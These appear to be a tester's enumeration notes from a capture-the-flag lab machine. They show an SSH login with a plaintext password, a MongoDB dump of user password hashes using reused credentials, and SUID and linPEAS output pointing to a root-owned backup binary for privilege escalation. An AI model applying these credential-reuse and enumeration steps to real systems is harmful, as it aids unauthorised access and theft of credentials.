4 box enum mark

# ssh mark:5AYRft73VtFpc84k

mark@node:/home$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash

mark@node:/home$ ls -la
total 20
drwxr-xr-x  5 root root 4096 Aug 31  2017 .
drwxr-xr-x 25 root root 4096 Sep  2  2017 ..
drwxr-xr-x  2 root root 4096 Aug 31  2017 frank
drwxr-xr-x  3 root root 4096 Sep  3  2017 mark
drwxr-xr-x  6 root root 4096 Sep  3  2017 tom
# no user: frank

mark@node:/var/www/myplace$ cat package.json
{
    "name": "myplace",
    "description": "A secure place to meet new people.",
    "version": "1.0.0",
    "private": true,
    "dependencies": {
        "express": "4.15.x",
        "express-session": "1.15.x",
        "body-parser": "1.17.x",
        "mongodb": "2.2.x"
    }
}

$ mongosh --host localhost -u mark -p 5AYRft73VtFpc84k myplace
Current Mongosh Log ID: 614a22df5b8cc6d49ba3bea3
Connecting to:          mongodb://localhost:27017/myplace?directConnection=true&serverSelectionTimeoutMS=2000
Using MongoDB:          3.2.16
Using Mongosh:          1.0.6

For mongosh info see: https://docs.mongodb.com/mongodb-shell/

myplace> show dbs
MongoServerError: not authorized on admin to execute command { listDatabases: 1 }
myplace> show collections
users
myplace> db.users.find({})
[
  {
    _id: ObjectId("59a7365b98aa325cc03ee51c"),
    username: 'myP14ceAdm1nAcc0uNT',
    password: 'dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af',
    is_admin: true
  },
  {
    _id: ObjectId("59a7368398aa325cc03ee51d"),
    username: 'tom',
    password: 'f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240',
    is_admin: false
  },
  {
    _id: ObjectId("59a7368e98aa325cc03ee51e"),
    username: 'mark',
    password: 'de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73',
    is_admin: false
  },
  {
    _id: ObjectId("59aa9781cced6f1d1490fce9"),
    username: 'rastating',
    password: '5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0',
    is_admin: false
  }
]

SiudEnum

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/local/bin/backup
------------------------------

mark@node:/tmp$ file /usr/local/bin/backup
/usr/local/bin/backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped

# no missing .so files
mark@node:/tmp$ ldd /usr/local/bin/backup
        linux-gate.so.1 =>  (0xf76f4000)
        libc.so.6 => /lib32/libc.so.6 (0xf7535000)
        /lib/ld-linux.so.2 (0xf76f5000)
		
mark@node:/tmp$ ls -la /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup
# we cannot run it

PEAS

OS: Linux version 4.4.0-93-generic
Description:    Ubuntu 16.04.3 LTS

# running process
mongodb   1223  0.3 10.1 282984 76676 ?        Ssl  18:20   0:08 /usr/bin/mongod --auth --quiet --config /etc/mongod.conf

╣ Active Ports
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -

╣ Users with console
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash
root:x:0:0:root:/root:/bin/bash
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash

uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)